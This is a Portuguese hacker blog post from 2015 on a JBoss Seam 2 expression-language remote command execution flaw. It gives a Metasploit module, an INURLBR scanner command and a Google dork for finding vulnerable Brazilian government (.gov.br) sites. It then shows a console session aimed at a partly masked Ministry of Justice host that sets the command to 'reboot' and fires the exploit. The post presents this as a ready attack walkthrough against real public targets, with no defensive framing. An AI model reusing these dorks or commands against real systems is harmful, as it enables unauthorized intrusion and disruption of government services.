Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

sexta-feira, 19 de junho de 2015

JBoss Seam 2 Remote Command Execution - Metasploit

JBoss Seam 2 Remote Command Execution - Metasploit

JBoss Seam 2 (jboss-seam2), as used in JBoss Enterprise Application Platform 4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression Language (EL) expressions, which allows remote attackers to execute arbitrary code via a crafted URL. This modules also has been tested successfully against IBM WebSphere 6.1 running on iSeries. NOTE: this is only a vulnerability when the Java Security Manager is not properly configured.

JBoss Seam 2 (jboss-seam2), as used in JBoss Enterprise Application Platform 4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression Language (EL) expressions, which allows remote attackers to execute arbitrary code via a crafted URL. This modules also has been tested successfully against IBM WebSphere 6.1 running on iSeries. NOTE: this is only a vulnerability when the Java Security Manager is not properly configured.
  • MODULE METASPLOIT:auxiliary/admin/http/jboss_seam_exec
  • COMMAND SCANNER INURLBR:/inurlbr.php --dork 'site:.gov.br inurl:.seam' -s jboss.txt -q 1,6
  • DORK:site:.gov.br inurl:.seam  intitle:"JBoss Seam Debug"
Configuração:
  • CMD  - The command to execute.
  • RHOST - The target address
  • RPORT  - The target port
  • TARGETURI - Target URI
msf > use auxiliary/admin/http/jboss_seam_exec
msf auxiliary(jboss_seam_exec) > set RHOST *******.mj.gov.br
msf auxiliary(jboss_seam_exec) > set RPORT 80
msf auxiliary(jboss_seam_exec) > set CMD reboot
msf auxiliary(jboss_seam_exec) > set TARGETURI  /******/home.seam
msf auxiliary(jboss_seam_exec) > exploit

Output:
msf > use auxiliary/admin/http/jboss_seam_exec msf auxiliary(jboss_seam_exec) > set RHOST *******.mj.gov.br msf auxiliary(jboss_seam_exec) > set RPORT 80 msf auxiliary(jboss_seam_exec) > set CMD reboot msf auxiliary(jboss_seam_exec) > set TARGETURI  /******/home.seam msf auxiliary(jboss_seam_exec) > exploit

Resultado:

Resultado:

Nenhum comentário:

Postar um comentário

............